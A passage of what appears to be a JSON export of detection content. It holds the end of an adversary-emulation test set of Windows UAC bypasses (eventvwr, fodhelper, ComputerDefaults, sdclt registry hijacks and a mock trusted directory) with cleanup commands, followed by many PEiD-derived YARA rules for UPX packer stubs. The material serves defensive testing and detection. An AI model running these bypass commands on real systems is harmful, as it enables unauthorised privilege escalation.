Set-ItemProperty \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\r\n Start-Process \"C:\\Windows\\System32\\eventvwr.msc\"\r\n cleanup_command: |\r\n Remove-Item \"HKCU:\\software\\classes\\mscfile\" -force -Recurse -ErrorAction Ignore\r\n name: powershell\r\n- name: Bypass UAC using Fodhelper\r\n auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182\r\n description: |\r\n Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.\r\n Upon execution, \"The operation completed successfully.\" will be shown twice and command prompt will be opened.\r\n supported_platforms:\r\n - windows\r\n input_arguments:\r\n executable_binary:\r\n description: Binary to execute with UAC Bypass\r\n type: path\r\n default: C:\\Windows\\System32\\cmd.exe\r\n executor:\r\n command: |\r\n reg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /ve /d \"#{executable_binary}\" /f\r\n reg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\r\n fodhelper.exe\r\n cleanup_command: |\r\n reg.exe delete hkcu\\software\\classes\\ms-settings /f >nul 2>&1\r\n name: command_prompt\r\n- name: Bypass UAC using Fodhelper - PowerShell\r\n auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa\r\n description: |\r\n PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.\r\n Upon execution command prompt will be opened.\r\n supported_platforms:\r\n - windows\r\n input_arguments:\r\n executable_binary:\r\n description: Binary to execute with UAC Bypass\r\n type: path\r\n default: C:\\Windows\\System32\\cmd.exe\r\n executor:\r\n command: |\r\n New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\r\n New-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\r\n Set-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\r\n Start-Process \"C:\\Windows\\System32\\fodhelper.exe\"\r\n cleanup_command: |\r\n Remove-Item \"HKCU:\\software\\classes\\ms-settings\" -force -Recurse -ErrorAction Ignore\r\n name: powershell\r\n- name: Bypass UAC using ComputerDefaults (PowerShell)\r\n auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f\r\n description: |\r\n PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10\r\n Upon execution administrative command prompt should open\r\n supported_platforms:\r\n - windows\r\n input_arguments:\r\n executable_binary:\r\n description: Binary to execute with UAC Bypass\r\n type: path\r\n default: C:\\Windows\\System32\\cmd.exe\r\n executor:\r\n command: |\r\n New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\r\n New-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\r\n Set-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"#{executable_binary}\" -Force\r\n Start-Process \"C:\\Windows\\System32\\ComputerDefaults.exe\"\r\n cleanup_command: |\r\n Remove-Item \"HKCU:\\software\\classes\\ms-settings\" -force -Recurse -ErrorAction Ignore\r\n name: powershell\r\n elevation_required: true\r\n- name: Bypass UAC by Mocking Trusted Directories\r\n auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1\r\n description: |\r\n Creates a fake \"trusted directory\" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems\r\n Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch\r\n supported_platforms:\r\n - windows\r\n input_arguments:\r\n executable_binary:\r\n description: Binary to execute with UAC Bypass\r\n type: path\r\n default: C:\\Windows\\System32\\cmd.exe\r\n executor:\r\n command: |\r\n mkdir \"\\\\?\\C:\\Windows \\System32\\\"\r\n copy \"#{executable_binary}\" \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\r\n mklink c:\\testbypass.exe \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\r\n cleanup_command: |\r\n rd \"\\\\?\\C:\\Windows \\\" /S /Q >nul 2>nul\r\n del \"c:\\testbypass.exe\" >nul 2>nul\r\n name: command_prompt\r\n elevation_required: true\r\n- name: Bypass UAC using sdclt DelegateExecute\r\n auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7\r\n description: |\r\n Bypasses User Account Control using a fileless method, registry only. \r\n Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe\r\n [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)\r\n Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)\r\n supported_platforms:\r\n - windows\r\n input_arguments:\r\n command.to.execute:\r\n description: Command to execute\r\n type: string\r\n default: cmd.exe /c notepad.exe\r\n executor:\r\n command: |\r\n New-Item -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Value '#{command.to.execute}'\r\n New-ItemProperty -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Name \"DelegateExecute\"\r\n Start-Process -FilePath $env:windir\\system32\\sdclt.exe\r\n Start-Sleep -s 3\r\n cleanup_command: |\r\n Remove-Item -Path \"HKCU:\\Software\\Classes\\Folder\" -Recurse -Force -ErrorAction Ignore\r\n name: powershell"
},
{
"id": 102,
"key": "upx-packer",
"type": {
"id": 1,
"name": "YARA",
"syntax_lang": "YARA"
},
"name": "UPX Packer",
"rule": "rule UPX_v30_EXE_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 00 57 83 C3 04 53 68 ?? ?? ?? 00 56 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070_Hint_WIN_EP: PEiD\r\n{\r\n strings:\r\n $a = { 8C CB B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8D ?? ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC 2E ?? ?? ?? ?? 73 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_020_EXE: PEiD\r\n{\r\n strings:\r\n $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 AF AD 0E 0E 0E 06 1F 07 16 68 00 00 BD FF FF F7 E1 93 CB 55 50 58 21 03 03 02 07 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Delphi_stub_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF EB 0E ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x_2: PEiD\r\n{\r\n strings:\r\n $a = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_302: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Scrambler_RC_v1x: PEiD\r\n{\r\n strings:\r\n $a = { 90 61 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n $b = { 66 C7 05 ?? ?? ?? ?? 75 07 E9 ?? FE FF FF 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Delphi_stub_Laszlo_Markus: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF EB 0E ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_b_Farb_rausch_Consumer_Consulting: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_MANtiCORE: PEiD\r\n{\r\n strings:\r\n $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_c_Farb_rausch_Consumer_Consulting: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser: PEiD\r\n{\r\n strings:\r\n $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n $b = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_070_PE_DLL: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 99 01 00 00 60 E8 00 00 00 00 58 83 E8 48 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 FC 01 00 00 83 CD FF 31 DB EB 0C 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Alternative_stub_additional: PEiD\r\n{\r\n strings:\r\n $a = { B9 ?? ?? BE ?? ?? BF C0 FF FD }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_123_Markus_Laszlo: PEiD\r\n{\r\n strings:\r\n $a = { 31 2E 32 33 00 55 50 58 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_071_072_PE: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA 00 00 FF 57 66 81 87 00 00 00 00 00 00 81 C6 B3 01 00 00 EB 0A 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_b_Farb_rausch_Consumer_Consulting_: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF FC B2 80 31 DB A4 B3 02 E8 6D 00 00 00 73 F6 31 C9 E8 64 00 00 00 73 1C 31 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 89 E8 B3 01 56 89 FE 29 C6 F3 A4 5E EB 8E 00 D2 75 05 8A 16 46 10 D2 C3 31 C9 41 E8 EE FF FF FF 11 C9 E8 E7 FF FF FF 72 F2 C3 31 C0 31 DB 31 C9 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 89 D8 E2 D9 8D BE ?? ?? ?? ?? 8B 07 09 C0 74 45 8B 5F 04 8D 84 30 ?? ?? ?? ?? 01 F3 50 83 C7 08 FF 96 ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 ?? ?? ?? ?? 61 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 EC 01 ?? ?? 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PackerUPX_CompresorGratuito_wwwupxsourceforgenet: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?0 ?? 00 8D BE ?? ?? F? FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_050_070: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 58 83 E8 3D }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_071_072_PE_DLL: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE EF 00 00 FF 57 66 81 87 00 00 00 00 00 00 81 C6 B1 01 00 00 EB 07 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_dos_exe_additional: PEiD\r\n{\r\n strings:\r\n $a = { B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8C C8 05 ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_MANtiCORE_: PEiD\r\n{\r\n strings:\r\n $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V194_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n strings:\r\n $a = { FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_MANtiCORE_: PEiD\r\n{\r\n strings:\r\n $a = { 60 B8 ?? ?? ?? ?? B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? ?? C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_com: PEiD\r\n{\r\n strings:\r\n $a = { B9 ?? ?? BE ?? ?? BF C0 FF FD }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Alternative_stub_Laszlo_Markus: PEiD\r\n{\r\n strings:\r\n $a = { EB 02 EB EA EB FC 8A 06 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v080_v084_additional: PEiD\r\n{\r\n strings:\r\n $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_DLL_additional: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v072_Hint_DOS_EP: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 83 ?? ?? 31 DB 5E 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? EB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPXLock_v11_CyberDoom_Bob_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? 00 60 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_DLL_additional: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_p_ECLiPSE_layer: PEiD\r\n{\r\n strings:\r\n $a = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 D2 EB 01 0F 56 EB 01 0F E8 03 00 00 00 EB 01 0F EB 01 0F 5E EB 01 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_sibaway7yahoocom: PEiD\r\n{\r\n strings:\r\n $a = { E2 FA 94 FF E0 61 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_UPX_0896_102_105_124_emadicius_h: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v20_Markus_Laszlo_Reiser_h_additional: PEiD\r\n{\r\n strings:\r\n $a = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_V3042005_MANtiCORE_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? ?? ?? ?? ?? E2 FA 61 68 ?? ?? ?? ?? C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 B8 ?? ?? ?? ?? B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? ?? C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_v10_CyberDoom_Team_X: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v081_v084_Modified: PEiD\r\n{\r\n strings:\r\n $a = { 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 ?? ?? ?? 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 }\r\n $b = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_V194_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n strings:\r\n $a = { FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_p_ECLiPSE_layer_additional: PEiD\r\n{\r\n strings:\r\n $a = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 D2 EB 01 0F 56 EB 01 0F E8 03 00 00 00 EB 01 0F EB 01 0F 5E EB 01 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_120_Markus_Laszlo: PEiD\r\n{\r\n strings:\r\n $a = { 31 2E 32 30 00 55 50 58 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_124_Markus_Laszlo: PEiD\r\n{\r\n strings:\r\n $a = { 31 2E 32 34 00 55 50 58 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modifier_v01x: PEiD\r\n{\r\n strings:\r\n $a = { 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_pe_exe: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_stub_additional: PEiD\r\n{\r\n strings:\r\n $a = { 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption: PEiD\r\n{\r\n strings:\r\n $a = { 60 B8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8A 14 08 80 F2 ?? 88 14 08 41 83 F9 ?? 75 F1 }\r\n $b = { 60 B8 ?? ?? ?? 00 B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPXHiT_v001_DJ_Siba: PEiD\r\n{\r\n strings:\r\n $a = { 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v060_v061: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 58 83 E8 3D 50 8D B8 FF 57 66 81 87 8D B0 F0 01 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 }\r\n $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 E8 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_293_LZMA: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_wwwupxsourceforgenet_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? 00 8D BE ?? ?? ?? FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_051_PE: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 D8 01 00 00 83 CD FF 31 DB 90 90 90 90 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 0B 8A 06 46 88 07 47 EB EB 90 90 90 B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_DLL_additional: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_v01_Borland_Delphi_HMX0101_additional: PEiD\r\n{\r\n strings:\r\n $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser_additional: PEiD\r\n{\r\n strings:\r\n $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v30_DLL_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 C7 0B 00 00 60 BE 00 ?? ?? ?? 8D BE 00 ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 00 